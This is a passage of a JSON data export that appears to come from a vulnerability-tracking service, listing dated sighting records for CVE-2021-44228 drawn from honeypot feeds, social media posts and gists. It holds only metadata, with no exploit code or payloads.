"2025-04-12T00:00:00.000000Z"}, {"uuid": "e2683a05-8afb-4652-ab1a-f59ba6384e3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-14)", "content": "", "creation_timestamp": "2025-04-14T00:00:00.000000Z"}, {"uuid": "dc415950-486c-4dfb-93ca-34a44e9ca883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-01)", "content": "", "creation_timestamp": "2025-07-01T00:00:00.000000Z"}, {"uuid": "b4c6c98a-ae77-4f99-870e-80391e575a1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-11)", "content": "", "creation_timestamp": "2025-06-11T00:00:00.000000Z"}, {"uuid": "82655090-caf3-4c68-8c72-e696b4464916", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/ragolsec.com/post/3lmusdy4c2s2g", "content": "", "creation_timestamp": "2025-04-15T19:21:39.936113Z"}, {"uuid": "3481f47d-5979-440f-9587-cb43321cd94a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/ragolsec.com/post/3lmusdykwss2g", "content": "", "creation_timestamp": "2025-04-15T19:21:40.421343Z"}, {"uuid": "0cd6917f-ef76-4301-8ced-f78b1ee7841c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-13)", "content": "", "creation_timestamp": "2025-06-13T00:00:00.000000Z"}, {"uuid": "984ce781-30f3-46da-a1da-9f1c88a24f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-15)", "content": "", "creation_timestamp": "2025-04-15T00:00:00.000000Z"}, {"uuid": "9b015e8e-43c6-42a2-a0b2-b4bb5cab2171", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-21)", "content": "", "creation_timestamp": "2025-05-21T00:00:00.000000Z"}, {"uuid": "a1e44e88-712e-4db4-be1c-c1a7720441a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-16)", "content": "", "creation_timestamp": "2025-04-16T00:00:00.000000Z"}, {"uuid": "eb36afa5-80e6-4927-a9cf-de953fe0926f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-05)", "content": "", "creation_timestamp": "2025-07-05T00:00:00.000000Z"}, {"uuid": "333a802d-e99c-4839-9ae8-9e9bf620b671", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-16)", "content": "", "creation_timestamp": "2025-04-16T00:00:00.000000Z"}, {"uuid": "3ad8cc0b-cc0e-4f3b-a62b-cddfa62fb340", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-26)", "content": "", "creation_timestamp": "2025-05-26T00:00:00.000000Z"}, {"uuid": "05c6252e-1ba7-4669-86b7-ef621f5be88b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-18)", "content": "", "creation_timestamp": "2025-04-18T00:00:00.000000Z"}, {"uuid": "27097430-a1ba-445b-8399-e6e798edcc42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-12)", "content": "", "creation_timestamp": "2025-07-12T00:00:00.000000Z"}, {"uuid": "ade3d8a7-7e36-4e2d-a41b-f03b05143b37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-17)", "content": "", "creation_timestamp": "2025-04-17T00:00:00.000000Z"}, {"uuid": "2928625a-f0d5-4085-81e1-a79db431cd88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/David-VTUK/6dfab9be82c272a427aef0162ae3eb31", "content": "", "creation_timestamp": "2025-05-27T11:37:39.000000Z"}, {"uuid": "9152ac67-ea50-43e7-bf52-a908f593d3f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-19)", "content": "", "creation_timestamp": "2025-04-19T00:00:00.000000Z"}, {"uuid": "263285fe-d2e5-4e95-b5d5-c90d069ec122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lpxm5jn2ab2u", "content": "", "creation_timestamp": "2025-05-25T02:24:14.464669Z"}, {"uuid": "39201ff0-5287-4dd2-82ba-3b5085a28e5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-03)", "content": "", "creation_timestamp": "2025-06-03T00:00:00.000000Z"}, {"uuid": "c06cc7ab-6871-4155-a8f4-a1f1fe0c4c31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-28)", "content": "", "creation_timestamp": "2025-05-28T00:00:00.000000Z"}, {"uuid": "11c77701-dc3c-4da7-8ec4-05c19b02a2ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/Psynosaur/7a31ba2c0d1286e1daf3686d35f77e10", "content": "", "creation_timestamp": "2025-07-06T11:40:25.000000Z"}, {"uuid": "34da3b8b-e1c0-4410-ac37-3331eafa4a90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-15)", "content": "", "creation_timestamp": "2025-07-15T00:00:00.000000Z"}, {"uuid": "44b47f7f-d2be-4d6c-bf2c-2318ec257fd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-19)", "content": "", "creation_timestamp": "2025-06-19T00:00:00.000000Z"}, {"uuid": "4aeaa282-e450-4d82-b66e-5f6563db598f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "a7fd414a-9a18-4f4f-b30b-e9f458cd1cab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-21)", "content": "", "creation_timestamp": "2025-04-21T00:00:00.000000Z"}, {"uuid": "e7bab3e2-f10a-4eef-babc-792c841b814e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "caddeaff-fe7c-4575-9069-ca91a3965207", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-28)", "content": "", "creation_timestamp": "2025-06-28T00:00:00.000000Z"}, {"uuid": "ad3ebcb5-8c98-448a-a147-007745998c14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-30)", "content": "", "creation_timestamp": "2025-05-30T00:00:00.000000Z"}, {"uuid": "3ba41a13-676c-49c6-a801-f7bbcfaa2f69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-22)", "content": "", "creation_timestamp": "2025-04-22T00:00:00.000000Z"}, {"uuid": "5108257e-9a18-4883-a7b5-92006edc7cfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-16)", "content": "", "creation_timestamp": "2025-06-16T00:00:00.000000Z"}, {"uuid": "65ef621b-c489-4119-aea3-7e71c531f40f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-03)", "content": "", "creation_timestamp": "2025-07-03T00:00:00.000000Z"}, {"uuid": "0913ce49-94f3-4a59-8429-ea0054ebd29b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "e0bfffca-3f76-4d9f-904b-abe9ed049b16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-16)", "content": "", "creation_timestamp": "2025-05-16T00:00:00.000000Z"}, {"uuid": "4e17ae91-586b-4a5a-92c4-fd0dbc810471", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-05)", "content": "", "creation_timestamp": "2025-06-05T00:00:00.000000Z"}, {"uuid": "74ba9dfe-438d-4568-a844-340a395fb32a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/nonexphere/3308a2b3dea1ad7fe0a7daf5579953ff", "content": "", "creation_timestamp": "2025-05-27T18:26:36.000000Z"}, {"uuid": "1f91d870-54b5-4c44-9966-a6891077ada9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-23)", "content": "", "creation_timestamp": "2025-04-23T00:00:00.000000Z"}, {"uuid": "25e81d3d-04c7-4ec2-8b99-3a1e10d11be9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-08)", "content": "", "creation_timestamp": "2025-06-08T00:00:00.000000Z"}, {"uuid": "5b1d0354-0c60-4708-8582-6ae2d68fb949", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "d3655cb3-b46f-49ee-9b1b-32ec168fddeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-27)", "content": "", "creation_timestamp": "2025-04-27T00:00:00.000000Z"}, {"uuid": "ca5bbc55-7455-4b49-ae20-521dac258d70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-24)", "content": "", "creation_timestamp": "2025-05-24T00:00:00.000000Z"}, {"uuid": "0f6cced2-69ac-4d6a-88d7-e32cfd21e830", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-25)", "content": "", "creation_timestamp": "2025-04-25T00:00:00.000000Z"}, {"uuid": "d7f1b5ff-1a29-4b4d-ad4c-b0c690535dc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-26)", "content": "", "creation_timestamp": "2025-04-26T00:00:00.000000Z"}, {"uuid": "596319d8-f5ea-4d39-b4c5-9041c9e2d466", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-10)", "content": "", "creation_timestamp": "2025-07-10T00:00:00.000000Z"}, {"uuid": "a7834c10-117f-42b7-b249-0a5fb926408d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-07)", "content": "", "creation_timestamp": "2025-07-07T00:00:00.000000Z"}, {"uuid": "eafe2377-daa6-40df-83d0-54fbda8ba641", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-26)", "content": "", "creation_timestamp": "2025-04-26T00:00:00.000000Z"}, {"uuid": "dd55aed6-7e10-4b7e-a544-c5b35b354e50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-19)", "content": "", "creation_timestamp": "2025-05-19T00:00:00.000000Z"}, {"uuid": "ad84de6d-3161-45dd-a14a-5fb50f9cdb15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-02)", "content": "", "creation_timestamp": "2025-06-02T00:00:00.000000Z"}, {"uuid": "630ed291-4448-4187-af31-e477104f5b28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-30)", "content": "", "creation_timestamp": "2025-06-30T00:00:00.000000Z"}, {"uuid": "b9089a03-88f8-4a35-bae9-c2757416e08a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-29)", "content": "", "creation_timestamp": "2025-04-29T00:00:00.000000Z"}, {"uuid": "2aafcc5f-d6f2-4c95-a599-d4e0ce6401f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-14)", "content": "", "creation_timestamp": "2025-06-14T00:00:00.000000Z"}, {"uuid": "383a4c13-4a58-479d-af1f-fbc653122158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-28)", "content": "", "creation_timestamp": "2025-04-28T00:00:00.000000Z"}, {"uuid": "4dd08ec1-872a-4bba-b86d-2976cba9acec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-30)", "content": "", "creation_timestamp": "2025-04-30T00:00:00.000000Z"}, {"uuid": "75702687-369f-4531-8d5c-a9ccb602acb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-01)", "content": "", "creation_timestamp": "2025-05-01T00:00:00.000000Z"}, {"uuid": "e6c4bb55-d8c7-4844-a49c-2d355a3ea480", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-02)", "content": "", "creation_timestamp": "2025-05-02T00:00:00.000000Z"}, {"uuid": "414c5581-26fa-4e38-a2b9-a854522ee351", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-31)", "content": "", "creation_timestamp": "2025-05-31T00:00:00.000000Z"}, {"uuid": "59e7c8de-701f-4ddf-89fb-6566fe3e74b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-22)", "content": "", "creation_timestamp": "2025-05-22T00:00:00.000000Z"}, {"uuid": "0bac4638-001e-445e-a830-c3e80e832fe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-01)", "content": "", "creation_timestamp": "2025-05-01T00:00:00.000000Z"}, {"uuid": "c67e73fc-599a-4aba-b515-f96eb86045b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-03)", "content": "", "creation_timestamp": "2025-05-03T00:00:00.000000Z"}, {"uuid": "df513bf7-fb0e-4fc8-ac0b-4737ea303a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-10)", "content": "", "creation_timestamp": "2025-06-10T00:00:00.000000Z"}, {"uuid": "d5bbe0b1-6edf-4255-96ec-233e1ce6d2a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "e6c4d261-ed5f-4670-a839-cfcc58fa3260", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-23)", "content": "", "creation_timestamp": "2025-06-23T00:00:00.000000Z"}, {"uuid": "55e38e0e-5cad-4a30-a04e-d631640f5fc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-13)", "content": "", "creation_timestamp": "2025-07-13T00:00:00.000000Z"}, {"uuid": "7c107150-38b1-4fd1-91d5-475e25a85e7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-12)", "content": "", "creation_timestamp": "2025-06-12T00:00:00.000000Z"}, {"uuid": "18e3edda-615c-416f-b4d6-7fd39c8344c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "afbdc143-d3f2-4eb4-b28d-ac1db34fa872", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "ab74575d-2799-4d03-b87f-2c9bf6ab59ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-05)", "content": "", "creation_timestamp": "2025-05-05T00:00:00.000000Z"}, {"uuid": "f858f62b-9406-4c94-a1b6-549a57be3012", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3lqxtz6tsne2o", "content": "", "creation_timestamp": "2025-06-06T22:10:10.638727Z"}, {"uuid": "7a643dd4-0011-4fcb-9ae2-e94f7aca3488", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "ceed0c36-022e-4882-b85c-730664e5c637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-09)", "content": "", "creation_timestamp": "2025-07-09T00:00:00.000000Z"}, {"uuid": "51988fab-eac2-4753-bc54-8f1ab3534a98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-17)", "content": "", "creation_timestamp": "2025-05-17T00:00:00.000000Z"}, {"uuid": "85b5af61-39f3-446b-b561-23d4563bbd6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-02)", "content": "", "creation_timestamp": "2025-07-02T00:00:00.000000Z"}, {"uuid": "96d56f56-136b-4985-a3f8-3295b80347cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-20)", "content": "", "creation_timestamp": "2025-06-20T00:00:00.000000Z"}, {"uuid": "f5bda616-788d-4cd9-813f-0d1b452d4d1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/b4c819a4-f4df-4618-bb39-fa1d8365b7dd", "content": "", "creation_timestamp": "2025-07-09T06:16:16.000000Z"}, {"uuid": "ca22eb56-cd41-44f5-93e8-81d9ed8ccbc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 